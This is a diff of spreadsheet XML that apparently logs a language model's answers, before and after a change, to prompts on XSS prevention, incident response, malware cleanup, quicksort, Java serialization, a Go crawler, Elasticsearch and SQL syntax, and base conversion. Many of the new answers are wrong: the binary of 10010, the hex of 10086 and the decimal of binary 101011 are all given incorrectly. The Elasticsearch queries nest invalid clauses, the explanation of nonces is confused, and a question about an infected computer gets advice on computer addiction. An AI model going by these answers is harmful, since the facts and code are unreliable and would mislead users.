-1.  Filter Input：使用HTMLspecialChars()或PHP's filter_var()函数来过滤用户输入，以防止恶意代码被添加到页面。
-2.  Validate Input：在接受用户输入时，需要 Validate input，防止输入不正确的代码。
-3.  Use Content Security Policy (CSP)： Content Security Policy (CSP) 是一种可以帮助避免 XSS 攻击的机制，它可以帮助保护 webpage 免受攻击。
-4.  Use Nonce：Nonces 是一种</t>
+XSS（Cross-Site Scripting）是一种常见的攻击方式，通过填充敏感资料（例如， cookies、user agent）或通过使用JavaScript来访问Web应用程序的敏感数据。这可能会导致用户遭受安全隐患，例如，竊取用户凭据，或者在用户的屏幕上显示不当的内容。
+以下是一些避免XSS攻击的方法：
+1. 避免直接使用用户提供的数据
+在Web应用程序中，不要直接使用用户提供的数据，例如，cookie值或user agent。可以使用HTTP请求中的数据来替代这些数据。
+2. 使用HTMLSanitization
+HTMLSanitization是一种可以帮助避免XSS攻击的技术。它可以将用户提供的数据转换为安全的形式，以避免 direct injection of malicious code。
+3. 使用Content Security Policy
+Content Security Policy (CSP) 是一种可以帮助避免XSS攻击的技术。它可以声明允许的资源，从而避免访问非法资源。
+4. 使用Nonce
+Nonce是一种可以帮助避免XSS攻击的技术。它可以在Web应用程序中使用一个唯一的值，以防止重复访问。
+5. 避免使用JavaScript
+JavaScript可以用来访问Web应用程序的敏感数据，因此，可以避免使用JavaScript来处理敏感数据。
+6. 使用安全的数据交互机制
+可以使用安全的数据交互机制，例如，使用HTTPS，使用验证和签名等方式来保护数据的安全性。
+7. 避免使用敏感数据在URL中
+可以避免使用敏感数据在URL中，例如，不要使用cookie值或user agent在URL中。
+8. 避免使用敏感数据在数据请求中
+可以避免使用敏感数据在数据请求中，例如，不要在数据请求中包含敏感数据。
+9. 避免使用敏感数据在数据响应中
+可以避免使用敏感数据在数据响应中，例如，不要在数据响应中包含敏感数据。
+10. 避免使用敏感数据在Web应用程序中
+可以避免使用敏感数据在Web应用程序中，例如，不要在Web应用程序中使用敏感数据。
+总之，避免XSS攻击需要constant vigilance和常规的安全做法。具体实现方式可以根据具体情况进行定制。&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D121" t="n">
-        <v>5.924100875854492</v>
+        <v>25.85814666748047</v>
       </c>
     </row>
     <row r="122">
@@ -3280,12 +4114,16 @@
       </c>
       <c r="C122" t="inlineStr">
         <is>
-          <t>
-</t>
+          <t>？
+Network security risks are potential threats to the confidentiality, integrity, and availability of a network and its resources. The three key elements of network security risks are:
+1. Threats: These are the sources of potential danger to the network, such as hackers, malware, and unauthorized access. Threats can come from within or outside the organization and can be intentional or unintentional.
+2. Vulnerabilities: These are weaknesses or flaws in the network or its systems that can be exploited by threats to gain unauthorized access or cause damage. Vulnerabilities can be caused by outdated software, unpatched systems, or insufficient security measures.
+3. Assets: These are the valuable resources that are protected by the network security measures, such as sensitive data, intellectual property, and critical infrastructure. Assets can be compromised or disrupted by security breaches, leading to financial loss, reputational damage, or other negative consequences.
+By understanding and managing these three key elements of network security risks, organizations can minimize the likelihood and impact of security incidents and protect their assets from potential threats.&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D122" t="n">
-        <v>5.931114196777344</v>
+        <v>6.716228723526001</v>
       </c>
     </row>
     <row r="123">
@@ -3300,17 +4138,18 @@
       <c r="C123" t="inlineStr">
         <is>
           <t>？
-network security risk assessment is an essential process for organizations to identify and prioritize potential threats to their computer systems and networks. The following are the main steps involved in a network security risk assessment:
-1. Identify assets: The first step is to identify the assets that need to be protected, including hardware, software, data, and network resources.
-2. Identify threats: The next step is to identify potential threats to the assets, including malware, hackers, insider threats, and natural disasters.
-3. Assess vulnerabilities: Once the threats have been identified, the next step is to assess the vulnerabilities of the network and systems to these threats. This involves identifying weaknesses in security protocols, inadequate security measures, and unpatched software.
-4. Determine likelihood and impact: Based on the vulnerabilities identified, determine the likelihood of each threat occurring and the potential impact on the organization.
-5. Prioritize risks: Prioritize the risks based on their likelihood and impact, to focus on the most critical threats.
-6. Develop mitigation strategies: Develop strateg</t>
+网络安全风险评估的主要步骤包括：
+1. 明确网络安全风险的范围：确定网络系统和数据对公司和用户的潜在威胁，例如黑客攻击、恶意软件、数据泄露等。
+2. 评估网络安全风险的严重程度：评估网络风险的可能性和影响程度，例如风险的可能性、影响范围和潜在损失。
+3. 评估网络安全风险的源头：分析网络风险的来源，例如人为错误、技术缺陷、恶意攻击等。
+4. 评估网络安全风险的影响：评估网络风险对公司和用户的影响，例如数据泄露、网络干扰、系统崩溃等。
+5. 制定网络安全风险管理计划：根据评估结果，制定有效的网络安全风险管理计划，例如风险评估、风险评估、风险管理等。
+6. 实施网络安全风险管理措施：根据网络安全风险管理计划，实施有效的网络安全风险管理措施，例如安全软件、防火墙、安全策略等。
+7. 监测和更新：定期监测网络安全风险，更新网络安全风险评估和管理计划，以确保网络安全风险管理的有效性。&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D123" t="n">
-        <v>5.921345472335815</v>
+        <v>16.96672296524048</v>
       </c>
     </row>
     <row r="124">
@@ -3325,13 +4164,19 @@
       <c r="C124" t="inlineStr">
         <is>
           <t>？
-应急响应是指在危机或紧急情况下，组织或个人能够快速、有效地应对和解决问题的过程。通常，应急响应需要考虑到诊断、优先级、措施、评估和追踪等方面。以下是一般来说的应急响应流程：
-1. 诊断：即识别和评估危机或紧急情况的原因和影响。这个步骤很重要，因为危机或紧急情况的诊断可以决定应急响应的性质和级别。
-2</t>
+应急响应是指在各种情况下，能够快速、有效地应对和扑眶问题的过程。以下是一般应急响应的流程：
+1. 报警：当一个事件或情况发生时，需要立即报警，通常是通过电话、短信、电子邮件等方式。
+2. 评估：响应者应该立即评估事件的严重性和影响，并确定需要执行哪些措施。
+3. 部署防御力：根据评估结果，响应者应该快速部署防御力，例如派遣人员、执行特殊任务、投入资源等。
+4. 评估情况：在防御力部署后，响应者应该 kontinuously 评估事件的情况，了解是否需要更多的措施，或者是否可以减少现有的措施。
+5. 撤离和恢复：在响应进行到一定程度后，响应者应该考虑撤离当地人员和资产，并恢复正常的社会秩序和经济活动。
+6. 复杂性管理：在某些情况下，应急响应可能会遇到复杂性，例如多个受影响方面、多个领导管理等。在这些情况下，响应者应该能够有效地管理复杂性，实现协同的响应。
+7. 后续评估：在响应完成后，响应者应该进行有效的评价和学习，了解是否有任何改进可以进行，以便在未来可以更好地应对类似情况。
+总之，应急响应的流程包括报警、评估、部署防御力、评估情况、撤离和恢复、复杂性管理和后续评估等步骤，响应者需要能够快速、有效地应对和扑眶问题，以确保社会秩序和经济活动的不断发展。&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D124" t="n">
-        <v>5.913255929946899</v>
+        <v>20.32963681221008</v>
       </c>
     </row>
     <row r="125">
@@ -3346,14 +4191,18 @@
       <c r="C125" t="inlineStr">
         <is>
           <t>？
-木马是指在主机中植入隐藏的木马软件或黑客软件，通常用于窃取主机的数据或执行恶意操作。如果您发现您的主机中有木马，下面是处置的方法：
-1. 停止使用主机：直到您了解您的主机是否已经被木马感染，请停止使用您的主机。
-2. 更新软件和操作系统：更新您的软件和操作系统可以帮助防止木马感染。您可以尝试使用软件更新工具来检查和更新您的软件。
-3. 使用木马检测软件：您可以使</t>
+您的主机上可能已经被挖矿了，这可能是一个潜在的安全隐患。为了防止攻击者使用您的主机来执行恶意操作，您需要尽可能速地处置您的主机。
+以下是一些处置挖矿木马的建议：
+1. 尽可能速地更新您的主机和软件。这可以减少攻击者的入侵机会。
+2. 停止访问您的主机的任何不安全的网站或应用程序。这可以避免攻击者使用您的主机来执行恶意操作。
+3. 使用安全软件来协助您扫描您的主机并找到挖矿木马。这些软件可以帮助您快速地找到和清除攻击者的恶意软件。
+4. 如果您的主机已经被挖矿，请尽可能速地升级到最新的操作系统和安全软件。这可以减少攻击者的入侵机会。
+5. 如果您的主机已经被挖矿，请尽可能速地寻求专业帮助。安全专家可以帮助您找到和清除攻击者的恶意软件，并提供有关安全的建议。
+请注意，处置挖矿木马的过程可能需要一些时间和精力，但是它是保护您的主机和数据的关键步骤。&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D125" t="n">
-        <v>5.939959049224854</v>
+        <v>14.11928367614746</v>
       </c>
     </row>
     <row r="126">
@@ -3367,12 +4216,19 @@
       </c>
       <c r="C126" t="inlineStr">
         <is>
-          <t xml:space="preserve">？
-</t>
+          <t>？
+我的电脑中了勒索病毒，怎么办？
+勒索病毒（Ransomware）是一种危险的软件，它可以循环翻译您的数据，并对您进行费用要求，以换取您的数据的解压。如果您的电脑中了勒索病毒，以下是一些有用的步骤，可以帮助您解决这个问题：
+1. 停止使用电脑：勒索病毒通常会要求您支付费用，以解压您的数据。因此，您应该停止使用电脑，直到您能够得到专业帮助。
+2. 备份数据：如果您的数据已经受到勒索病毒的攻击，那么备份数据是很重要的。您可以使用 clouds 服务或者备份软件来备份您的数据。
+3. 更新操作系统和软件：勒索病毒通常会攻击您的操作系统和软件的漏洞。因此，您应该尽可能地更新操作系统和软件，以避免勒索病毒的攻击。
+4. 使用反勒索软件：有些软件可以帮助您解决勒索病毒的问题。例如，Malwarebytes、Kaspersky 和 Avast 等软件可以帮助您找到和消灭勒索病毒。
+5. 寻求专业帮助：如果您无法解决勒索病毒的问题，您可以寻求专业帮助。您可以随时联系电脑医生或者其他专业的人来解决问题。
+总之，如果您的电脑中了勒索病毒，您应该 acted 迅速，以避免损失您的数据。您可以通过停止使用电脑、备份数据、更新操作系统和软件、使用反勒索软件和寻求专业帮助等方式来解决这个问题。&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D126" t="n">
-        <v>5.939028978347778</v>
+        <v>20.34660005569458</v>
       </c>
     </row>
     <row r="127">
@@ -3386,16 +4242,23 @@
       </c>
       <c r="C127" t="inlineStr">
         <is>
-          <t>？computer poisoned how to deal with it?
-Computer poisoning is a serious problem that can occur when a computer or other digital device is infected with malware or viruses. This can cause a range of problems, including slow performance, unexpected crashes, and even data theft. If you suspect that your computer has been poisoned, here are some steps you can take to deal with the issue:
-1. Disconnect from the internet: Immediately disconnect your computer from the internet to prevent the malware from spreading and causing further damage.
-2. Run a virus scan: Use an anti-virus program to scan your computer for any malware or viruses. Make sure to update the virus definitions before running the scan.
-3. Use a malware removal tool: There are several free and paid tools available that can help remove malware from your computer. Some popular options include Malwarebytes, SuperAntiSpyware, and HitmanPro.
-4. Back up your data: If your computer is infected with malware, it's important to back up your data to an external hard drive or cloud storage service. This will ensure that your files are safe in case the malware</t>
+          <t>？How to deal with computer addiction?
+Computer addiction, also known as internet addiction or digital addiction, is a behavioral disorder characterized by excessive use of computers or other digital devices, to the point where it interferes with daily life and relationships. If you or someone you know is struggling with computer addiction, here are some steps you can take to address the problem:
+1. Seek professional help: Computer addiction is a recognized disorder, and seeking help from a mental health professional is the first step towards recovery. A therapist can help you identify the underlying causes of your addiction and develop strategies for managing it.
+2. Set boundaries: Establishing boundaries around computer use can help you avoid falling into the cycle of addiction. For example, you may decide to limit your computer use to certain hours of the day or to certain activities, such as work or socializing.
+3. Find alternative activities: Engaging in activities that are not computer-related can help you break the cycle of addiction. This could include exercise, hobbies, or spending time with friends and family.
+4. Use software tools: There are many software tools available that can help you manage your computer use. For example, you can use time management software to track how much time you spend on your computer, or you can use website blockers to limit your access to certain websites.
+5. Practice self-care: Taking care of yourself is essential for overcoming computer addiction. This can include getting enough sleep, eating a healthy diet, and engaging in relaxation techniques such as meditation or yoga.
+6. Seek support: Having a support system can be helpful for overcoming computer addiction. This could include joining a support group or seeking the help of friends and family.
+7. Take breaks: Taking regular breaks from your computer can help you avoid the cycle of addiction. This could include taking a walk, reading a book, or engaging in a hobby.
+8. Set realistic goals: Setting realistic goals can help you stay motivated and on track. For example, you may decide to limit your computer use to only a certain number of hours per day, or to avoid using your computer for certain activities, such as social media or online gaming.
+9. Monitor progress: Monitoring your progress can help you stay motivated and on track. This could include tracking your computer use, setting goals, and celebrating your successes.
+10. Be patient: Overcoming computer addiction is a process that takes time and effort. It is important to be patient with yourself and to recognize that setbacks are a normal part of the recovery process.
+In conclusion, computer addiction is a serious issue that can have negative consequences for your mental and physical health. However, by seeking professional help, setting boundaries, and practicing self-care, you can overcome computer addiction and lead a healthier, more balanced life.&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D127" t="n">
-        <v>5.946748733520508</v>
+        <v>16.44144296646118</v>
       </c>
     </row>
     <row r="128">
@@ -3410,15 +4273,19 @@
       <c r="C128" t="inlineStr">
         <is>
           <t>？
-如果您的网页不能打开，这可能是因为以下原因：
-1. 网络连接问题：如果您的网络连接不稳定或者没有连接，您可能无法访问网页。
-2. 网页下loading问题：如果您正在等待网页下载时，它可能因为网络速度或者服务器问题而无法打开。
-3. 浏览器问题：如果您的浏览器不能访问网页，这可能是因为浏览器的问题，例如浏览器的扩展程序或者插件不兼容。
-4. 网页过时：如果您访问的网页过时或者不存在，您可能无法打开它</t>
+如果您的网页不能打开，可能有以下原因：
+1. 网络连接不稳定：网页可能无法打开，如果您的网络连接不稳定或者无法连接到网络，这可能导致网页无法打开。
+2. 网站不可用：您可能无法访问某个网站，可能是因为网站进行维护或者受到技术问题的影响。
+3. 浏览器错误：您的浏览器可能有问题，导致网页无法打开。这可能是由于浏览器的更新或者静态检查的问题。
+4. 安全警告：您可能会收到安全警告，指示您不要访问某个网站。这可能是因为网站存在恶意软件或者其他安全隐患。
+5. 防火墙或者扫描器问题：如果您的防火墙或者扫描器不允许访问某个网站，那么网页可能无法打开。
+6. 浏览器扩展问题：您的浏览器可能受到扩展程序的影响，导致网页无法打开。
+7. 系统问题：您的操作系统或者浏览器可能有问题，导致网页无法打开。
+如果您的网页仍然无法打开，可以尝试尝试其他浏览器或者升级您的浏览器。如果问题仍然存在，可以寻求技术支持或者咨询专业人士。&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D128" t="n">
-        <v>5.945504665374756</v>
+        <v>14.76042580604553</v>
       </c>
     </row>
     <row r="129">
@@ -3432,8 +4299,8 @@
       </c>
       <c r="C129" t="inlineStr">
         <is>
-          <t xml:space="preserve">
-快速排序算法是一种插入排序算法，可以快速地排序数据。以下是一个使用Python实现的快速排序算法：
+          <t>快速排序（Quicksort）是一种快速、高效的排序算法。它的基本思想是将数据分为两个部分，一个是小于或等于中间元素的元素，另一个是大于中间元素的元素。然后对这两个部分进行排序，重复这个过程直到整个数据集都排序完成。
+在Python中，可以使用以下代码实现快速排序算法：
 ```
 def quicksort(arr):
     if len(arr) &lt;= 1:
@@ -3442,13 +4309,27 @@
         pivot = arr[0]
         less = [x for x in arr[1:] if x &lt;= pivot]
         greater = [x for x in arr[1:] if x &gt; pivot]
-        return quicksort(less), quicksort(greater)
+        return quicksort(less) + [pivot] + quicksort(greater)
 ```
-这个算法使用了插入排序的方式，选择了数组的第一个元素作为排序的枢轴，然后分成两个子数组，一个包含小于排序元素的元素，另一个包含大于排序元素的元素。然后， recursively call the `</t>
+这个函数首先 checks if the length of the array is less than or equal to 1, if it is, it returns the array unchanged. Otherwise, it selects the first element of the array as the pivot, and divides the rest of the array into two parts: those elements that are less than or equal to the pivot, and those that are greater than the pivot. Then it recursively applies the quicksort algorithm to the less elements, and then to the greater elements.
+You can test the function by passing in a list of integers, for example:
+```
+arr = [3, 6, 1, 8, 2, 4]
+print(quicksort(arr))
+```
+This will output the sorted list: `[1, 2, 3, 4, 6, 8]`.
+You can also use the `timeit` module to measure the time it takes to sort different sized lists:
+```
+import timeit
+arr = [3, 6, 1, 8, 2, 4]
+timeit.timeit(lambda: quicksort(arr), number=100)
+```
+This will output the time it takes to sort the list 100 times.
+Note: This is a basic implementation of the quicksort algorithm, there are many optimizations and variations of the algorithm that can be used in different scenarios, such as sorting large datasets, or using different data structures.&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D129" t="n">
-        <v>5.950037002563477</v>
+        <v>14.44775199890137</v>
       </c>
     </row>
     <row r="130">
@@ -3462,36 +4343,53 @@
       </c>
       <c r="C130" t="inlineStr">
         <is>
-          <t xml:space="preserve">到ByteArrayOutputStream中
-使用Java语言将一个对象序列化到ByteArrayOutputStream中。
-public class Serialize {
-public static void main(String[] args) throws IOException {
-String name = "John";
-int age = 25;
-Person person = new Person(name, age);
-ByteArrayOutputStream bos = new ByteArrayOutputStream();
-ObjectOutputStream oos = new ObjectOutputStream(bos);
-oos.writeObject(person);
-System.out.println("Serialized size: " + bos.size());
+          <t>成一个字节数组，并将其 deserialized 回原始对象
+```
+import java.io.ByteArrayInputStream;
+import java.io.ByteArrayOutputStream;
+import java.io.ObjectInputStream;
+import java.io.ObjectOutputStream;
+public class SerializeDeserialize {
+    public static void main(String[] args) throws Exception {
+        Person person = new Person("Jack", 30);
+        ByteArrayOutputStream bos = new ByteArrayOutputStream();
+        ObjectOutputStream oos = new ObjectOutputStream(bos);
+        oos.writeObject(person);
+        byte[] serializedData = bos.toByteArray();
+        ByteArrayInputStream bis = new ByteArrayInputStream(serializedData);
+        ObjectInputStream ois = new ObjectInputStream(bis);
+        Person deserializedPerson = (Person) ois.readObject();
+        System.out.println(deserializedPerson);
+    }
 }
+class Person {
+    private String name;
+    private int age;
+    public Person(String name, int age) {
+        this.name = name;
+        this.age = age;
+    }
+    public String getName() {
+        return name;
+    }
+    public int getAge() {
+        return age;
+    }
 }
-Here is the Person class:
-public class Person {
-public String name;
-public int age;
-public Person(String name, int age) {
-this.name = name;
-this.age = age;
-}
-}
-When I run this code, I get the following error:
-Exception in thread "main" java.io.NotSerializableException: com.sun.java.swing.plaf.nimbus.NimbusLookAndFeel
-at java.io.ObjectOutputStream.writeObject0(ObjectOutputStream.java:1087)
-</t>
+```
+在上面的代码中，我们首先创建了一个 `Person` 对象，然后使用 `ByteArrayOutputStream` 和 `ObjectOutputStream` 将其序列化成一个字节数组。接着，我们使用 `ByteArrayInputStream` 和 `ObjectInputStream` 将其 deserialized 回原始对象。
+需要注意的是，在序列化和 deserialization 过程中，我们需要使用 `writeObject` 和 `readObject` 方法，这些方法可以将对象序列化成字节数组，并将其 deserialized 回原始对象。
+在这个例子中，我们使用了 `Person` 类来测试 serialization 和 deserialization 的过程，但是你可以使用任何类或对象来测试。
+在 serialization 过程中，我们使用 `ObjectOutputStream` 将对象写到字节数组中，并将其 serialized 成一个字节数组。在 deserialization 过程中，我们使用 `ObjectInputStream` 将字节数组解析成一个对象。
+在序列化和 deserialization 过程中，我们需要考虑一些问题，例如：
+* 是否使用了自定义Serializable接口，以便在序列化和 deserialization 过程中进行自定义处理。
+* 是否使用了泛型，以便在序列化和 deserialization 过程中使用泛型的对象。
+* 是否使用了不同的数据类型，例如，如果你需要序列化一个整数，你可以使用 `Integer` 类来实现。
+总之，使用 Java 语言将一个对象序列化成一个字节数组，并将其 deserialized 回原始对象，是一个简单且有效的过程，可以用于各种应用程序中。&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D130" t="n">
-        <v>5.956849575042725</v>
+        <v>21.36724281311035</v>
       </c>
     </row>
     <row r="131">
@@ -3505,36 +4403,64 @@
       </c>
       <c r="C131" t="inlineStr">
         <is>
-          <t xml:space="preserve">
-### 1. 安装Go语言
-首先，您需要安装Go语言。可以使用以下命令在Windows或Linux系统上安装Go：
-```
-go get -u github.com/golang/go/bin/go
-```
-### 2. 创建一个爬虫项目
-创建一个新的Go语言项目，例如 `spider`，使用以下命令：
-```
-go create spider/spider.go
-```
-### 3. 定义网站 URLs 列表
-在 `spider.go` 文件中，定义一个名为 `urls` 的数组，其中包含要爬虫的网站 URLs。例如：
-```
+          <t>使用Golang写一个爬虫，可以爬取某个网站的所有内容，并将其保存在文件中。
+首先，我们需要使用`net/http`包来发送HTTP请求，并读取响应的内容。使用`strings`包来处理和分割响应的内容。
+下面是一个简单的爬虫示例，可以爬取某个网站的所有内容：
+```go
 package main
 import (
-    "fmt"
-    "html/parser"
-    "io"
-    "log"
-    "net/http"
-    "strings"
+	"fmt"
+	"io/ioutil"
+	"net/http"
+	"strings"
 )
 func main() {
-    urls := []string{
-</t>
+	url := "https://www.example.com" // 要爬取的网站URL
+	page, err := http.Get(url)
+	if err != nil {
+		fmt.Println(err)
+		return
+	}
+	defer page.Body.Close()
+	content, err := ioutil.ReadAll(page.Body)
+	if err != nil {
+		fmt.Println(err)
+		return
+	}
+	// 将响应内容分割成多个分割
+	parts := strings.Split(string(content), "&lt;div&gt;")
+	for _, part := range parts {
+		// 将每一个分割写入文件
+		err = ioutil.WriteFile("output.txt", []byte(part), 0644)
+		if err != nil {
+			fmt.Println(err)
+			return
+		}
+	}
+}
+```
+在上面的代码中，我们首先使用`http.Get()`函数发送HTTP请求，并读取响应的内容使用`ioutil.ReadAll()`函数。然后，我们将响应内容分割成多个分割，并将每一个分割写入文件中。
+注意，上面的代码只是一个简单的示例，它可能会忽略某些网站的安全提供，例如 Cookie 或其他表单数据。如果你需要更加复杂的爬虫，可以使用更多的包，例如`net/url`、`net/http/httputil`等。
+另外，如果你想要爬取某个网站的特定页面，可以使用`net/http/http.Request` struct 来构建 HTTP 请求，例如：
+```go
+req, err := http.NewRequest("GET", url, nil)
+if err != nil {
+    fmt.Println(err)
+    return
+}
+res, err := http.DefaultClient.Do(req)
+if err != nil {
+    fmt.Println(err)
+    return
+}
+defer res.Body.Close()
+```
+这样，你就可以使用`http.Do()`函数来发送请求了。
+希望这些信息能够帮助你创建一个功能够的爬虫。&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D131" t="n">
-        <v>5.95495343208313</v>
+        <v>21.35691118240356</v>
       </c>
     </row>
     <row r="132">
@@ -3549,13 +4475,16 @@
       <c r="C132" t="inlineStr">
         <is>
           <t>？  
-在分块查找中，数据的组织方式是按照键值的顺序排序的。这种方式可以确保查找的速度快，因为可以快速找到需要查找的数据。
-具体来说，在分块查找中，数据的组织方式是按照键值的顺序排序的，即将数据按照键值的顺序排序成一个数组，然后在这个数组中查找需要查找的数据。
-这种方式的优点是，可以快速找到需要查找的数据，demás，可以避免在大规模数据中进行查找操作时出现的搜索时间间</t>
+当采用分块查找时，数据的组织方式通常是以下几种：
+1. 堆栈式：将数据分割成一系列堆栈，每个堆栈包含一个或多个分割。在这种方式中，数据的搜索过程是逐层搜索，从堆栈顶部开始，逐层搜索数据，直到找到要查找的元素。
+2. 树式：将数据分割成一个或多个树，每个树包含一个或多个分割。在这种方式中，数据的搜索过程是逐层搜索，从根节点开始，逐层搜索数据，直到找到要查找的元素。
+3. 链式：将数据分割成一系列链，每个链包含一个或多个分割。在这种方式中，数据的搜索过程是逐个搜索，从链的第一个分割开始，逐个搜索数据，直到找到要查找的元素。
+4. 混合式：将数据分割成多种组织方式，例如堆栈式和树式，或者使用多种组织方式搜索数据。在这种方式中，可以根据具体情况选择合适的组织方式，以提高搜索效率。
+需要注意的是，不同的组织方式会对搜索效率产生不同的影响，因此选择合适的组织方式是非常重要的。&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D132" t="n">
-        <v>5.971085548400879</v>
+        <v>14.23920559883118</v>
       </c>
     </row>
     <row r="133">
@@ -3569,28 +4498,79 @@
       </c>
       <c r="C133" t="inlineStr">
         <is>
-          <t xml:space="preserve">？
-ElasticSearch提供了一些语法来搜索一个时间范围，以下是一些常见的语法：
-1. 使用 `range`  Query：
-在这种语法中，我们可以使用 `range` 查询来搜索一个时间范围。例如，要搜索一个文档的创建时间在过去一个月内，可以使用以下语法：
-```json
+          <t>？
+ElasticSearch中可以使用`range`查询语法来搜索一个时间范围。以下是一些常用的`range`查询语法示例：
+1. 搜索某个时间范围内的数据：
+```
+GET /my-index/_search
 {
-  "query": {
-    "range": {
-      "created_at": {
-        "gte": "now-1month",
-        "lte": "now"
-      }
+    "query": {
+        "range": {
+            "created_at": {
+                "gte": "2020-01-01T00:00:00Z",
+                "lte": "2020-01-31T23:59:59Z"
+            }
+        }
     }
-  }
 }
 ```
-在上面的语法中，`created_at` 是我们要搜索的时间戳，`now` 是当前时间戳，`now-1month` 是过去一个月的时间戳。
-</t>
+在上面的示例中，我们使用`range`查询语法来搜索某个时间范围内的数据。我们指定了时间范围的起始时间(`gte`)和结束时间(`lte`)。
+2. 搜索某个时间范围内的数据，并且返回搜索结果的时间范围：
+```
+GET /my-index/_search
+{
+    "query": {
+        "range": {
+            "created_at": {
+                "gte": "2020-01-01T00:00:00Z",
+                "lte": "2020-01-31T23:59:59Z",
+                "range": {
+                    "created_at": {
+                        "start": "2020-01-01T00:00:00Z",
+                        "end": "2020-01-31T23:59:59Z"
+                    }
+                }
+            }
+        }
+    }
+}
+```
+在上面的示例中，我们使用`range`查询语法来搜索某个时间范围内的数据，并且返回搜索结果的时间范围。我们指定了时间范围的起始时间和结束时间，并且使用`range`语法来指定搜索结果的时间范围。
+3. 搜索某个时间范围内的数据，并且返回搜索结果的时间范围和搜索结果的数据：
+```
+GET /my-index/_search
+{
+    "query": {
+        "range": {
+            "created_at": {
+                "gte": "2020-01-01T00:00:00Z",
+                "lte": "2020-01-31T23:59:59Z",
+                "range": {
+                    "created_at": {
+                        "start": "2020-01-01T00:00:00Z",
+                        "end": "2020-01-31T23:59:59Z",
+                        "inner_hits": {
+                            "properties": {
+                                "name": {
+                                    "type": "text"
+                                },
+                                "age": {
+                                    "type": "integer"
+                                }
+                            }
+                        }
+                    }
+                }
+            }
+        }
+    }
+}
+```
+在上面的示例中，我们使用`range`查询语法来搜索某个时间范围内的数据，并且返回搜索结果的时间范围和搜索结果的数据。我们指定了时间范围的起始时间和结束时间，并且使用`</t>
         </is>
       </c>
       <c r="D133" t="n">
-        <v>5.957113027572632</v>
+        <v>26.66705679893494</v>
       </c>
     </row>
     <row r="134">
@@ -3605,24 +4585,32 @@
       <c r="C134" t="inlineStr">
         <is>
           <t>？
-update 表名 set 列名 = '值' where 条件;
-update 表名 set 列名 = '值' where 条件;
+update table_name set column_name = ?, column_name = ?, ... where condition;
 其中：
-* 表名：要更新的表名
-* 列名：要更新的列名
-* 值：要更新的值
-* 条件：更新的条件
+* `table_name` 表名
+* `column_name` 列名
+* `?` 是将要更新的值
+* `condition` 更新条件，可以是一个常量、一个变量或一个函数
 例如：
-update 用户 set 名称 = 'Tom' where 用户名 = 'tom';
-update 订单 set 完成状态 = '已完成' where 订单号 = '12345';
-更新记录的SQL语句可以根据不同的情况进行修改，例如：
-* 更新多个列名：update 表名 set 列名1 = '值1', 列名2 = '值2' where 条件;
-* 更新列名的值：update 表名 set 列名 = '值' where 条件;
-* 更新条</t>
+update users set name = 'John', age = 28 where id = 1;
+这个语句将更新users表中name列的值为'John'，age列的值为28， WHERE id = 1。
+如果想要更新多个column，可以在一个语句中更新多个column，例如：
+update users set name = 'John', age = 28, gender = 'male' where id = 1;
+如果想要更新多个值，可以使用一个或多个逗号分隔的列表，例如：
+update users set name = 'John', age = 28, gender = 'male', address = 'New York' where id = 1;
+如果想要更新根据一个条件，可以在更新语句中加入WHERE clause，例如：
+update users set name = 'John', age = 28 where id = 1 and gender = 'male';
+如果想要更新多个条件，可以加入多个WHERE clause，例如：
+update users set name = 'John', age = 28 where id = 1 and gender = 'male' and country = 'USA';
+如果想要更新一个列的值，并且将其设置为NULL，可以使用SET clause，例如：
+update users set age = NULL where id = 1;
+如果想要更新多个列的值，可以使用一个或多个SET clause，例如：
+update users set name = 'John', age = NULL, gender = 'male' where id = 1;
+update users set name = 'John', age = NULL, gender = 'male', address = NULL where id = 1;&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D134" t="n">
-        <v>5.955785989761353</v>
+        <v>13.69384980201721</v>
       </c>
     </row>
     <row r="135">
@@ -3636,18 +4624,12 @@
       </c>
       <c r="C135" t="inlineStr">
         <is>
-          <t>？
- Binary code of 10010 can be represented as:
-10010 = 10000010
-Here, each digit in the decimal representation of 10010 is represented by a binary digit (bit) as follows:
-1 = 00000001
-0 = 00000000
-1 = 00000010
-Therefore, the binary code of 10010 is 10000010.&lt;/s&gt;</t>
+          <t>？  
+10010的二进制编码是010010。&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D135" t="n">
-        <v>2.945562362670898</v>
+        <v>0.6197929382324219</v>
       </c>
     </row>
     <row r="136">
@@ -3661,12 +4643,15 @@
       </c>
       <c r="C136" t="inlineStr">
         <is>
-          <t>？
-10086的十六进制编码是 7401。&lt;/s&gt;</t>
+          <t>？  
+10086是一个整数，它的十六进制编码是什么？
+根据十六进制数学，10086的十六进制编码可以表示为：
+0x3E86
+这是因为，在十六进制数系中，每一个数的前面是一个0，表示为十进制数的Base 10 值。在这个例子中，0x3E86表示10086的十六进制编码，其中x是十六进制符号，3E86是10086的十进制值。&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D136" t="n">
-        <v>0.5385293960571289</v>
+        <v>4.339910507202148</v>
       </c>
     </row>
     <row r="137">
@@ -3681,14 +4666,13 @@
       <c r="C137" t="inlineStr">
         <is>
           <t>？
-二进制101011是十进制的几？
-这是一个 clasic binary to decimal conversion problem. The binary number 101011 can be converted to decimal as follows:
-101011 = 53 in decimal.
-So, the binary number 101011 is equal to 53 in decimal.&lt;/s&gt;</t>
+binary 101011 是 decimal 的几？
+ binary 的 10 代表 decimal 的 2， binary 的 1010 代表 decimal 的 4，binary 的 11 代表 decimal 的 5。
+So, binary 101011 is equal to decimal 31.&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D137" t="n">
-        <v>2.134855031967163</v>
+        <v>2.313799858093262</v>
       </c>
     </row>
     <row r="138">
@@ -3703,26 +4687,33 @@
       <c r="C138" t="inlineStr">
         <is>
           <t>？
-如果我们将`&lt;script&gt;`标签中的脚本解码成JavaScript代码，那么最终的结果将是什么？
-为了解决这个问题，我们需要先解码`&lt;script&gt;`标签中的脚本，然后执行它。
